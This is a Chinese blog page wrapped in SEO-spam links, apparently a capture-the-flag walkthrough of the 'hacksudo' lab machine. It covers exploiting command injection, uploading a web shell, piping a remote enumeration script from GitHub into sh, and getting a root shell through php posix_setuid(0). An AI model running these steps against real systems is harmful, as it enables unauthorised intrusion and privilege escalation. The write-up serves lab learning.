当前位置: 首页 > news >正文

公司如何做网站做推广彩页设计画面元素

公司如何做网站做推广,彩页设计画面元素,怎么自己优化网站,wordpress author=1环境配置 一开始桥接错网卡了 搞了半天 改回来就行了 信息收集 漏洞发现 扫个目录 大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap 都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历 换个gobuster扫一下 先看看g…

环境配置

一开始桥接错网卡了 搞了半天 改回来就行了

信息收集

在这里插入图片描述

漏洞发现

扫个目录
在这里插入图片描述
大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap
都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历
换个gobuster扫一下
在这里插入图片描述
先看看generator.php
在这里插入图片描述随便填点东西执行一下 感觉像命令注入
在这里插入图片描述
在这里插入图片描述
尝试弹个shell
没成功
那就写了个一句话 然后用蚁剑传shell
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权

优化shell
在这里插入图片描述

看看还有没有用户,有可能待会会切过去
在这里插入图片描述
用linpeas枚举脆弱性
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
在这里插入图片描述

没看见特别显眼的
在这里插入图片描述
版本过高
考虑到有个hacksudo的用户
再收集一波信息看看能不能切过去
发现有个hacksudo的文件 在这里插入图片描述
在这里插入图片描述
有加密 一眼凯撒
试试
在这里插入图片描述
在这里插入图片描述

没有sudo权限
在这里插入图片描述
在work路径下发现sh文件
没执行权限
也没看见相关的计划任务
再传个linpeas枚举
在这里插入图片描述
可以lxd提权
在这里插入图片描述
也可以view 或 php提权
这里用php提权

CMD="/bin/sh"
./home/hacksudo/locker/php -r "posix_setuid(0); system('$CMD');"

在这里插入图片描述

http://www.yayakq.cn/news/18016/

相关文章:

  • 微商城微网站开发如何做推广和引流
  • 数字营销 h5 网站开发南宁网站设
  • 完整网站开发视频教程做网站哪里
  • 南京手机网站蜂网站开发
  • 网站图片批量上传北京手机网站设计价格
  • 注册qq空间网站百度seo推广方案
  • 大的网站建设公司好搜索引擎优化中的步骤包括
  • 网站做的一样算侵权吗dz论坛网站创建页面
  • 那些网站是做金融行业安全教育平台学生登录入口
  • 网站维护员工作内容网站建设 腾云
  • wordpress调用搜索结果wordpress基础优化
  • 做淘宝客注册网站好做吗做网站麻烦吗
  • 营销型网站建设的重要原则网站价钱
  • 品牌排名网站360竞价推广
  • 东莞浩智网站建设多少钱模板网官网
  • 重庆企业网站推广价格怎么样做一个网站
  • 中国服装设计网站网站名称注册保护
  • 做淘客网站用什么上传文件宣传型企业网站设计方案
  • 网站建设技术团队中国合伙人2做的什么网站
  • 深圳网站搭建找谁wordpress阅读最多插件
  • 做网站网站代理赚钱吗易思espcms企业网站管理系统
  • 免费购物商城网站建设网站后台上传图片做难吗?
  • wordpress企业网站DIY猪八戒网站做私活赚钱吗
  • 网站编辑器哪个好用计算机网络网站建设的实训总结6
  • 中国建设网站建设银行官网站下载
  • 体育类网站模板html怎么学
  • 网站建设课程简介图片海口建设网站建设
  • 自己做个网站dw怎么制作网页教程
  • 做企业网站有哪些好处做网站商城的小图标软件
  • 需要自己的网站需要怎么做朋友让你做网站如何拒绝